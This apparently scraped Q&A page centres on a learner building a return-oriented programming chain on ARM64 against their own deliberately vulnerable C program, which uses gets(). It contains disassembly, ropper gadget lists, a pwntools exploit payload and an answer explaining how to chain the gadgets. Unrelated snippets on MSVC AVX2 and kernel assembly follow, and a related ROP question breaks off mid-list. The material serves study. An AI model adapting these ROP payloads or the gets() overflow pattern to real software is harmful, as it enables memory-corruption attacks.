Return Oriented Programming on ARM (64-bit) - security
I am studying Rop on ARM (64 bit). So i am testing Rop vulnerability on my ARMv8 Cortex A-72 in order to understand how it works on Arm64.
I wrote a very simple c vulnerable code:
#include <stdio.h>
#include <string.h>
void win(unsigned magic){
if(magic == 0xdeadbeef)
printf("I Should Never be Called!\n");
}
void vuln(){
char buffer[80];
printf("Buffer at:%p\n",buffer);
gets(buffer);
}
int main(int argc, char **argv){
vuln();
}
In order to call the win function i think the correct rop chain is:
offset + pop {x0,pc} + correct_argument + win_address
This is the assembly code:
Dump of assembler code for function main:
0x00000055555557f8 <+0>: stp x29, x30, [sp, #-32]!
0x00000055555557fc <+4>: mov x29, sp
0x0000005555555800 <+8>: str w0, [sp, #28]
0x0000005555555804 <+12>: str x1, [sp, #16]
0x0000005555555808 <+16>: bl 0x55555557c8 <vuln>
0x000000555555580c <+20>: mov w0, #0x0 // #0
0x0000005555555810 <+24>: ldp x29, x30, [sp], #32
0x0000005555555814 <+28>: ret
Dump of assembler code for function vuln:
0x00000055555557c8 <+0>: stp x29, x30, [sp, #-96]!
0x00000055555557cc <+4>: mov x29, sp
0x00000055555557d0 <+8>: add x0, sp, #0x10
0x00000055555557d4 <+12>: mov x1, x0
0x00000055555557d8 <+16>: adrp x0, 0x5555555000
0x00000055555557dc <+20>: add x0, x0, #0x8c0
0x00000055555557e0 <+24>: bl 0x5555555680 <printf#plt>
0x00000055555557e4 <+28>: add x0, sp, #0x10
0x00000055555557e8 <+32>: bl 0x5555555690 <gets#plt>
0x00000055555557ec <+36>: nop
0x00000055555557f0 <+40>: ldp x29, x30, [sp], #96
0x00000055555557f4 <+44>: ret
Dump of assembler code for function win:
0x00000055555557b4 <+0>: sub sp, sp, #0x10
0x00000055555557b8 <+4>: str w0, [sp, #12]
0x00000055555557bc <+8>: nop
0x00000055555557c0 <+12>: add sp, sp, #0x10
0x00000055555557c4 <+16>: ret
I disabled the ASLR first. Then using gdb i identified the offset at which the pc gets overwritten. The offset is 96 bytes. The last 8 bytes of the offset overflow the link register therefore the pc will point to that. So the next step is to search the right gadget. Since i am working on ARMv8 and the function win() takes one argument i am looking for a pop {x0, pc} gadget to mount my rop chain. I used ropper to search for gadgets to build the rop chain. Following the output of ropper command:
0x00000000000007c0: add sp, sp, #0x10; ret;
0x00000000000007e4: add x0, sp, #0x10; bl #0x690; nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000648: add x16, x16, #0; br x17;
0x0000000000000668: add x16, x16, #0x10; br x17;
0x0000000000000678: add x16, x16, #0x18; br x17;
0x0000000000000688: add x16, x16, #0x20; br x17;
0x0000000000000698: add x16, x16, #0x28; br x17;
0x000000000000062c: add x16, x16, #0xff8; br x17;
0x0000000000000658: add x16, x16, #8; br x17;
0x0000000000000870: add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x00000000000006d8: adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x6e8; b #0x660; ret;
0x0000000000000708: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16;
0x0000000000000708: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16; ret;
0x0000000000000624: adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000660: adrp x16, #0x11000; ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17;
0x0000000000000670: adrp x16, #0x11000; ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17;
0x0000000000000680: adrp x16, #0x11000; ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17;
0x0000000000000690: adrp x16, #0x11000; ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17;
0x0000000000000650: adrp x16, #0x11000; ldr x17, [x16, #8]; add x16, x16, #8; br x17;
0x0000000000000640: adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x0000000000000744: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16;
0x0000000000000744: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16; ret;
0x00000000000006e4: b #0x660; ret;
0x00000000000007b0: b #0x720; sub sp, sp, #0x10; str w0, [sp, #0xc]; nop; add sp, sp, #0x10; ret;
0x0000000000000704: b.eq #0x71c; adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16;
0x0000000000000884: b.ne #0x868; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x00000000000006d4: bl #0x670; adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x6e8; b #0x660; ret;
0x00000000000007e0: bl #0x680; add x0, sp, #0x10; bl #0x690; nop; ldp x29, x30, [sp], #0x60; ret;
0x00000000000007e8: bl #0x690; nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000610: bl #0x6d8; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000790: bl #0x6f0; movz w0, #0x1; strb w0, [x19, #0x40]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000808: bl #0x7c8; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x000000000000087c: blr x3;
0x0000000000000718: br x16;
0x0000000000000718: br x16; ret;
0x0000000000000630: br x17;
0x00000000000006e0: cbz x0, #0x6e8; b #0x660; ret;
0x0000000000000710: cbz x1, #0x71c; mov x16, x1; br x16;
0x0000000000000710: cbz x1, #0x71c; mov x16, x1; br x16; ret;
0x0000000000000740: cbz x1, #0x758; adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16;
0x000000000000074c: cbz x2, #0x758; mov x16, x2; br x16;
0x000000000000074c: cbz x2, #0x758; mov x16, x2; br x16; ret;
0x0000000000000888: ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x000000000000088c: ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x0000000000000890: ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x0000000000000614: ldp x29, x30, [sp], #0x10; ret;
0x00000000000007a0: ldp x29, x30, [sp], #0x20; ret;
0x0000000000000894: ldp x29, x30, [sp], #0x40; ret;
0x00000000000007f0: ldp x29, x30, [sp], #0x60; ret;
0x00000000000006dc: ldr x0, [x0, #0xfc8]; cbz x0, #0x6e8; b #0x660; ret;
0x000000000000070c: ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16;
0x000000000000070c: ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16; ret;
0x0000000000000664: ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17;
0x0000000000000674: ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17;
0x0000000000000684: ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17;
0x0000000000000694: ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17;
0x0000000000000628: ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000654: ldr x17, [x16, #8]; add x16, x16, #8; br x17;
0x0000000000000644: ldr x17, [x16]; add x16, x16, #0; br x17;
0x000000000000079c: ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000748: ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16;
0x0000000000000748: ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16; ret;
0x0000000000000868: ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x0000000000000878: mov w0, w22; blr x3;
0x0000000000000874: mov x1, x23; mov w0, w22; blr x3;
0x0000000000000714: mov x16, x1; br x16;
0x0000000000000714: mov x16, x1; br x16; ret;
0x0000000000000750: mov x16, x2; br x16;
0x0000000000000750: mov x16, x2; br x16; ret;
0x000000000000086c: mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x000000000000060c: mov x29, sp; bl #0x6d8; ldp x29, x30, [sp], #0x10; ret;
0x00000000000008a8: mov x29, sp; ldp x29, x30, [sp], #0x10; ret;
0x000000000000080c: movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000794: movz w0, #0x1; strb w0, [x19, #0x40]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000620: stp x16, x30, [sp, #-0x10]!; adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000608: stp x29, x30, [sp, #-0x10]!; mov x29, sp; bl #0x6d8; ldp x29, x30, [sp], #0x10; ret;
0x00000000000008a4: stp x29, x30, [sp, #-0x10]!; mov x29, sp; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000800: str w0, [sp, #0x1c]; str x1, [sp, #0x10]; bl #0x7c8; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x00000000000007b8: str w0, [sp, #0xc]; nop; add sp, sp, #0x10; ret;
0x0000000000000804: str x1, [sp, #0x10]; bl #0x7c8; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000798: strb w0, [x19, #0x40]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x00000000000007b4: sub sp, sp, #0x10; str w0, [sp, #0xc]; nop; add sp, sp, #0x10; ret;
0x00000000000007bc: nop; add sp, sp, #0x10; ret;
0x000000000000063c: nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x00000000000007ec: nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000638: nop; nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x000000000000089c: nop; ret;
0x0000000000000618: ret;
How you can see there is no gadgets like pop {x0,pc} however reading the armv8 cheat sheet the ldp x29, x30, [sp], #0x60 pop x29 and x30 from the stack so basically we can consider ldp as a pop instruction. But again there is no gadget which pop the x0 register from stack.
So my question is: How can i mount the rop chain having that gadgets from roppper ?
Please help me to understand it. Thank you.
My exploit:
from pwn import *
#gadget
win = p64(0x000000555555580c)
gadget_ldp = p64(0x00000000000008f8) #ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
gadget_ldr = p64(0x00000000000008d8) # ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
magic = p64(0xdeadbeef)
buf = p64(0x7ffffff000)
#payload
payload = b'\x90'*56;
payload += win;
payload += b'\x90'*24; #offset
payload += gadget_ldp;
payload += b'\x00'*8; #in x19 must be zero
payload += b'\x90'*8; # ldp register x20
payload += buf; #ldp register x21
payload += magic; #ldp register x22
payload += b'\x90'*8; #ldp register x23
payload += b'\x90'*8; #ldp register x24
payload += gadget_ldr;
#make connection to the binary and send payload
conn = process('./badcode')
conn.sendline(payload)
print(conn.recvline())
conn.interactive()
With the gadget at 0x0888 we can load all of x19-x24 from the stack and return, so we can set all their values arbitrarily and go on.
0x0878 has mov w0, w22, which is nice, but then the branch is to x3 which we don't yet control.
But back up a few instructions and look at the 0x0868 gadget. Notable for us is:
ldr x3, [x21, x19, lsl #3]
//...
mov w0, w22
blr x3
So if in our previous step, we loaded x21 with some address where a pointer to win can be found (maybe a place on the stack that we've set), and set x19 to zero, then we get win in x3. And likewise if in our previous step we loaded x22 with 0xdeadbeef, then we get it in w0 here. So we should be able to branch to win with w0 set as desired.
Related
Can't get vectorclass library to compile to AVX2 instructions in MSVC2019
I have tried my best to get the vectorclass library to generate AVX2 instructions, but can't get it to. I'm using MSVC2019. Here are the compile options: /permissive- /ifcOutput "x64\Release" /GS /Qpar /GL /W3 /Gy /Zc:wchar_t /I"D:\Tools\vectorclass" /I"D:\Tools\libzmq/include" /I"D:\Tools\boost\boost_1_79_0" /Zi /Gm- /O2 /Ob2 /sdl /Fd"x64\Release\vc142.pdb" /Zc:inline /D "__AVX2__" /D "ZMQ_STATIC" /D "FILE_INPUT" /D "NDEBUG" /D "WIN32" /D "_CRT_SECURE_NO_WARNINGS" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /std:c17 /arch:AVX2 /Gd /Oi /MT /std:c++17 /FC /Fa"x64\Release" /EHsc /nologo /Fo"x64\Release" /Ot /Fp"x64\Release\RtnLink_MSVC.pch" /diagnostics:column In addition I've tried to force it with macro definitions AVX2 and INSTRSET but no luck. #define INSTRSET (8) #define __AVX2__ #pragma warning(disable : 4984) //warning C4984: 'if constexpr' is a C++17 language extension #include "vectorclass.h" size_t test(size_t size) { Vec8ui incr(8); Vec8ui accum(0, 1, 2, 3, 4, 5, 6, 7); for (size_t i = 8; i < size; i += 8) { accum = accum + accum; } size_t result = horizontal_max(accum); const __m256i incr2 = _mm256_set1_epi32(8); __m256i accum2 = _mm256_setr_epi32(0, 1, 2, 3, 4, 5, 6, 7); for (size_t i = 8; i < size; i += 8) { accum2 = _mm256_add_epi32(accum2, incr2); } __declspec(align(32)) int32_t values_array[8]; _mm256_store_si256((__m256i*)values_array, accum2); size_t result2 = values_array[0]; for (int i = 1; i < 8; i++) { if (values_array[i] > result2) { result2 = values_array[i]; } } return result; } This compiles to the following 2 loops: Using vectorclass (no AVX2 instructions): Vec8ui incr(8); 00007FF7A9BC2E5A mov edx,8 00007FF7A9BC2E5F lea rcx,[incr] 00007FF7A9BC2E63 call Vec8ui::Vec8ui (07FF7A9B58BFEh) Vec8ui accum(0, 1, 2, 3, 4, 5, 6, 7); 00007FF7A9BC2E68 mov dword ptr [rsp+40h],7 00007FF7A9BC2E70 mov dword ptr [rsp+38h],6 00007FF7A9BC2E78 mov dword ptr [rsp+30h],5 00007FF7A9BC2E80 mov dword ptr [rsp+28h],4 00007FF7A9BC2E88 mov dword ptr [rsp+20h],3 00007FF7A9BC2E90 mov r9d,2 00007FF7A9BC2E96 mov r8d,1 00007FF7A9BC2E9C xor edx,edx 00007FF7A9BC2E9E lea rcx,[accum] 00007FF7A9BC2EA2 call Vec8ui::Vec8ui (07FF7A9B54B99h) for (size_t i = 8; i < size; i += 8) { 00007FF7A9BC2EA7 mov qword ptr [rbp+98h],8 00007FF7A9BC2EB2 jmp __$EncStackInitStart+0A2h (07FF7A9BC2EC6h) 00007FF7A9BC2EB4 mov rax,qword ptr [rbp+98h] 00007FF7A9BC2EBB add rax,8 00007FF7A9BC2EBF mov qword ptr [rbp+98h],rax 00007FF7A9BC2EC6 mov rax,qword ptr [size] 00007FF7A9BC2ECD cmp qword ptr [rbp+98h],rax 00007FF7A9BC2ED4 jae __$EncStackInitStart+10Fh (07FF7A9BC2F33h) accum = accum + accum; 00007FF7A9BC2ED6 lea rax,[rbp+4C0h] 00007FF7A9BC2EDD lea rcx,[accum] 00007FF7A9BC2EE1 mov rdi,rax 00007FF7A9BC2EE4 mov rsi,rcx 00007FF7A9BC2EE7 mov ecx,20h 00007FF7A9BC2EEC rep movs byte ptr [rdi],byte ptr [rsi] 00007FF7A9BC2EEE lea rax,[rbp+480h] 00007FF7A9BC2EF5 lea rcx,[accum] 00007FF7A9BC2EF9 mov rdi,rax 00007FF7A9BC2EFC mov rsi,rcx 00007FF7A9BC2EFF mov ecx,20h 00007FF7A9BC2F04 rep movs byte ptr [rdi],byte ptr [rsi] 00007FF7A9BC2F06 lea r8,[rbp+4C0h] 00007FF7A9BC2F0D lea rdx,[rbp+480h] 00007FF7A9BC2F14 lea rcx,[rbp+380h] 00007FF7A9BC2F1B call operator+ (07FF7A9BC29C0h) 00007FF7A9BC2F20 lea rcx,[accum] 00007FF7A9BC2F24 mov rdi,rcx 00007FF7A9BC2F27 mov rsi,rax 00007FF7A9BC2F2A mov ecx,20h 00007FF7A9BC2F2F rep movs byte ptr [rdi],byte ptr [rsi] } 00007FF7A9BC2F31 jmp __$EncStackInitStart+90h (07FF7A9BC2EB4h) size_t result = horizontal_max(accum); 00007FF7A9BC2F33 lea rax,[rbp+500h] 00007FF7A9BC2F3A lea rcx,[accum] 00007FF7A9BC2F3E mov rdi,rax 00007FF7A9BC2F41 mov rsi,rcx 00007FF7A9BC2F44 mov ecx,20h 00007FF7A9BC2F49 rep movs byte ptr [rdi],byte ptr [rsi] 00007FF7A9BC2F4B lea rcx,[rbp+500h] 00007FF7A9BC2F52 call horizontal_max<Vec8ui> (07FF7A9B54FB3h) 00007FF7A9BC2F57 mov eax,eax 00007FF7A9BC2F59 mov qword ptr [result],rax Using intrinsics (we get AVX2 instructions): const __m256i incr2 = _mm256_set1_epi32(8); 00007FF7A9BC2F60 vmovdqu ymm0,ymmword ptr [__ymm#0000000800000008000000080000000800000008000000080000000800000008 (07FF7A9E87940h)] 00007FF7A9BC2F68 vmovdqu ymmword ptr [rbp+3C0h],ymm0 00007FF7A9BC2F70 vmovdqu ymm0,ymmword ptr [rbp+3C0h] 00007FF7A9BC2F78 vmovdqu ymmword ptr [incr2],ymm0 __m256i accum2 = _mm256_setr_epi32(0, 1, 2, 3, 4, 5, 6, 7); 00007FF7A9BC2F80 vmovdqu ymm0,ymmword ptr [__ymm#0000000700000006000000050000000400000003000000020000000100000000 (07FF7A9E87900h)] 00007FF7A9BC2F88 vmovdqu ymmword ptr [rbp+400h],ymm0 00007FF7A9BC2F90 vmovdqu ymm0,ymmword ptr [rbp+400h] 00007FF7A9BC2F98 vmovdqu ymmword ptr [accum2],ymm0 for (size_t i = 8; i < size; i += 8) { 00007FF7A9BC2FA0 mov qword ptr [rbp+158h],8 00007FF7A9BC2FAB jmp __$EncStackInitStart+19Bh (07FF7A9BC2FBFh) 00007FF7A9BC2FAD mov rax,qword ptr [rbp+158h] 00007FF7A9BC2FB4 add rax,8 00007FF7A9BC2FB8 mov qword ptr [rbp+158h],rax 00007FF7A9BC2FBF mov rax,qword ptr [size] 00007FF7A9BC2FC6 cmp qword ptr [rbp+158h],rax 00007FF7A9BC2FCD jae __$EncStackInitStart+1D5h (07FF7A9BC2FF9h) accum2 = _mm256_add_epi32(accum2, incr2); 00007FF7A9BC2FCF vmovdqu ymm0,ymmword ptr [accum2] 00007FF7A9BC2FD7 vpaddd ymm0,ymm0,ymmword ptr [incr2] 00007FF7A9BC2FDF vmovdqu ymmword ptr [rbp+440h],ymm0 00007FF7A9BC2FE7 vmovdqu ymm0,ymmword ptr [rbp+440h] 00007FF7A9BC2FEF vmovdqu ymmword ptr [accum2],ymm0 } 00007FF7A9BC2FF7 jmp __$EncStackInitStart+189h (07FF7A9BC2FADh) __declspec(align(32)) int32_t values_array[8]; _mm256_store_si256((__m256i*)values_array, accum2); 00007FF7A9BC2FF9 vmovdqu ymm0,ymmword ptr [accum2] 00007FF7A9BC3001 vmovdqa ymmword ptr [values_array],ymm0 size_t result2 = values_array[0]; 00007FF7A9BC3009 mov eax,4 00007FF7A9BC300E imul rax,rax,0 00007FF7A9BC3012 movsxd rax,dword ptr values_array[rax] 00007FF7A9BC301A mov qword ptr [result2],rax for (int i = 1; i < 8; i++) { 00007FF7A9BC3021 mov dword ptr [rbp+1D4h],1 00007FF7A9BC302B jmp __$EncStackInitStart+217h (07FF7A9BC303Bh) 00007FF7A9BC302D mov eax,dword ptr [rbp+1D4h] 00007FF7A9BC3033 inc eax 00007FF7A9BC3035 mov dword ptr [rbp+1D4h],eax 00007FF7A9BC303B cmp dword ptr [rbp+1D4h],8 00007FF7A9BC3042 jge __$EncStackInitStart+250h (07FF7A9BC3074h) if (values_array[i] > result2) { 00007FF7A9BC3044 movsxd rax,dword ptr [rbp+1D4h] 00007FF7A9BC304B movsxd rax,dword ptr values_array[rax*4] 00007FF7A9BC3053 cmp rax,qword ptr [result2] 00007FF7A9BC305A jbe __$EncStackInitStart+24Eh (07FF7A9BC3072h) result2 = values_array[i]; 00007FF7A9BC305C movsxd rax,dword ptr [rbp+1D4h] 00007FF7A9BC3063 movsxd rax,dword ptr values_array[rax*4] 00007FF7A9BC306B mov qword ptr [result2],rax
What's meaning of ".inst" in arm assembly instruction
Kernel version : 4.14.199 The spin_lock assembly instructions in crash is crash_arm64> dis _raw_spin_lock -x 0xffffff8008c41e90 <_raw_spin_lock>: stp x29, x30, [sp,#-32]! 0xffffff8008c41e94 <_raw_spin_lock+0x4>: str x19, [sp,#16] 0xffffff8008c41e98 <_raw_spin_lock+0x8>: mov x29, sp 0xffffff8008c41e9c <_raw_spin_lock+0xc>: mov x19, x0 0xffffff8008c41ea0 <_raw_spin_lock+0x10>: nop 0xffffff8008c41ea4 <_raw_spin_lock+0x14>: mov w0, #0x1 // #1 0xffffff8008c41ea8 <_raw_spin_lock+0x18>: bl 0xffffff80080f399c <preempt_count_add> 0xffffff8008c41eac <_raw_spin_lock+0x1c>: mov w10, #0x10000 // #65536 0xffffff8008c41eb0 <_raw_spin_lock+0x20>: .inst 0xb8aa0268 ; undefined 0xffffff8008c41eb4 <_raw_spin_lock+0x24>: nop 0xffffff8008c41eb8 <_raw_spin_lock+0x28>: nop 0xffffff8008c41ebc <_raw_spin_lock+0x2c>: nop 0xffffff8008c41ec0 <_raw_spin_lock+0x30>: eor w9, w8, w8, ror #16 0xffffff8008c41ec4 <_raw_spin_lock+0x34>: cbz w9, 0xffffff8008c41edc <_raw_spin_lock+0x4c> 0xffffff8008c41ec8 <_raw_spin_lock+0x38>: sevl 0xffffff8008c41ecc <_raw_spin_lock+0x3c>: wfe 0xffffff8008c41ed0 <_raw_spin_lock+0x40>: ldaxrh w10, [x19] 0xffffff8008c41ed4 <_raw_spin_lock+0x44>: eor w9, w10, w8, lsr #16 0xffffff8008c41ed8 <_raw_spin_lock+0x48>: cbnz w9, 0xffffff8008c41ecc <_raw_spin_lock+0x3c> 0xffffff8008c41edc <_raw_spin_lock+0x4c>: ldr x19, [sp,#16] 0xffffff8008c41ee0 <_raw_spin_lock+0x50>: ldp x29, x30, [sp],#32 0xffffff8008c41ee4 <_raw_spin_lock+0x54>: ret What's the meaning of .inst instructions ? 0xffffff8008c41eb0 <_raw_spin_lock+0x20>: .inst 0xb8aa0268 ; undefined I found the function definition in arch/arm64/include/asm/spinlock.h. static inline void arch_spin_lock(arch_spinlock_t *lock) { unsigned int tmp; arch_spinlock_t lockval, newval; asm volatile( /* Atomically increment the next ticket. */ ARM64_LSE_ATOMIC_INSN( /* LL/SC */ " prfm pstl1strm, %3\n" "1: ldaxr %w0, %3\n" " add %w1, %w0, %w5\n" " stxr %w2, %w1, %3\n" " cbnz %w2, 1b\n", /* LSE atomics */ " mov %w2, %w5\n" " ldadda %w2, %w0, %3\n" __nops(3) ) /* Did we get the lock? */ " eor %w1, %w0, %w0, ror #16\n" " cbz %w1, 3f\n" /* * No: spin on the owner. Send a local event to avoid missing an * unlock before the exclusive load. */ " sevl\n" "2: wfe\n" " ldaxrh %w2, %4\n" " eor %w1, %w2, %w0, lsr #16\n" " cbnz %w1, 2b\n" /* We got the lock. Critical section starts here. */ "3:" : "=&r" (lockval), "=&r" (newval), "=&r" (tmp), "+Q" (*lock) : "Q" (lock->owner), "I" (1 << TICKET_SHIFT) : "memory"); } In my opinion, the .inst 0xb8aa0268 should correspond to ldadda %w2, %w0, %3\n". Why the crash displayed is different from the source code ?
Find out where rop gadgets are actually loaded in memory using Ropper
I am studying ROP on Arm64, I posted my thread here Return Oriented Programming on ARM (64-bit) However a new/separate issue about choosing rop gadgets has arisen which requires the opening of a new thread. So to sum up i am studying ROP vulnerability on ARM 64 bit and i am trying to test it using a very simple c code (attached to the previous thread). I'am using ropper tool in order to search for gadgets to build my rop chain. But when i overflow the pc with the address of the gadget i got this within gdb: [!] Cannot disassemble from $PC [!] Cannot access memory at address 0x8f8 stopped 0x8f8 in ?? () I overflow the pc with 0x00000000000008f8 gadget but it can't be the actual address loaded in memory. Here the list of rop gadgets that i have got by using ropper: 0x0000000000000858: add x0, sp, #0x10; bl #0x6e0; nop; ldp x29, x30, [sp], #0x60; ret; 0x0000000000000828: add x0, x0, #0x930; bl #0x6c0; nop; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000688: add x16, x16, #0; br x17; 0x00000000000006a8: add x16, x16, #0x10; br x17; 0x00000000000006b8: add x16, x16, #0x18; br x17; 0x00000000000006c8: add x16, x16, #0x20; br x17; 0x00000000000006d8: add x16, x16, #0x28; br x17; 0x00000000000006e8: add x16, x16, #0x30; br x17; 0x000000000000066c: add x16, x16, #0xff8; br x17; 0x0000000000000698: add x16, x16, #8; br x17; 0x00000000000008e0: add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3; 0x0000000000000824: adrp x0, #0; add x0, x0, #0x930; bl #0x6c0; nop; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000728: adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x738; b #0x6a0; ret; 0x0000000000000758: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; 0x0000000000000758: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; ret; 0x0000000000000664: adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17; 0x00000000000006a0: adrp x16, #0x11000; ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17; 0x00000000000006b0: adrp x16, #0x11000; ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17; 0x00000000000006c0: adrp x16, #0x11000; ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17; 0x00000000000006d0: adrp x16, #0x11000; ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17; 0x00000000000006e0: adrp x16, #0x11000; ldr x17, [x16, #0x30]; add x16, x16, #0x30; br x17; 0x0000000000000690: adrp x16, #0x11000; ldr x17, [x16, #8]; add x16, x16, #8; br x17; 0x0000000000000680: adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17; 0x0000000000000794: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16; 0x0000000000000794: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16; ret; 0x0000000000000734: b #0x6a0; ret; 0x0000000000000754: b.eq #0x76c; adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; 0x00000000000008f4: b.ne #0x8d8; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret; 0x0000000000000724: bl #0x6b0; adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x738; b #0x6a0; ret; 0x000000000000082c: bl #0x6c0; nop; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000854: bl #0x6d0; add x0, sp, #0x10; bl #0x6e0; nop; ldp x29, x30, [sp], #0x60; ret; 0x000000000000085c: bl #0x6e0; nop; ldp x29, x30, [sp], #0x60; ret; 0x0000000000000648: bl #0x728; ldp x29, x30, [sp], #0x10; ret; 0x00000000000007e0: bl #0x740; movz w0, #0x1; strb w0, [x19, #0x48]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret; 0x000000000000087c: bl #0x83c; movz w0, #0; ldp x29, x30, [sp], #0x20; ret; 0x00000000000008ec: blr x3; 0x0000000000000768: br x16; 0x0000000000000768: br x16; ret; 0x0000000000000670: br x17; 0x0000000000000730: cbz x0, #0x738; b #0x6a0; ret; 0x0000000000000760: cbz x1, #0x76c; mov x16, x1; br x16; 0x0000000000000760: cbz x1, #0x76c; mov x16, x1; br x16; ret; 0x0000000000000790: cbz x1, #0x7a8; adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16; 0x000000000000079c: cbz x2, #0x7a8; mov x16, x2; br x16; 0x000000000000079c: cbz x2, #0x7a8; mov x16, x2; br x16; ret; 0x00000000000008f8: ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret; 0x00000000000008fc: ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret; 0x0000000000000900: ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret; 0x000000000000064c: ldp x29, x30, [sp], #0x10; ret; 0x00000000000007f0: ldp x29, x30, [sp], #0x20; ret; 0x0000000000000904: ldp x29, x30, [sp], #0x40; ret; 0x0000000000000864: ldp x29, x30, [sp], #0x60; ret; 0x000000000000072c: ldr x0, [x0, #0xfc8]; cbz x0, #0x738; b #0x6a0; ret; 0x000000000000075c: ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; 0x000000000000075c: ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; ret; 0x00000000000006a4: ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17; 0x00000000000006b4: ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17; 0x00000000000006c4: ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17; 0x00000000000006d4: ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17; 0x00000000000006e4: ldr x17, [x16, #0x30]; add 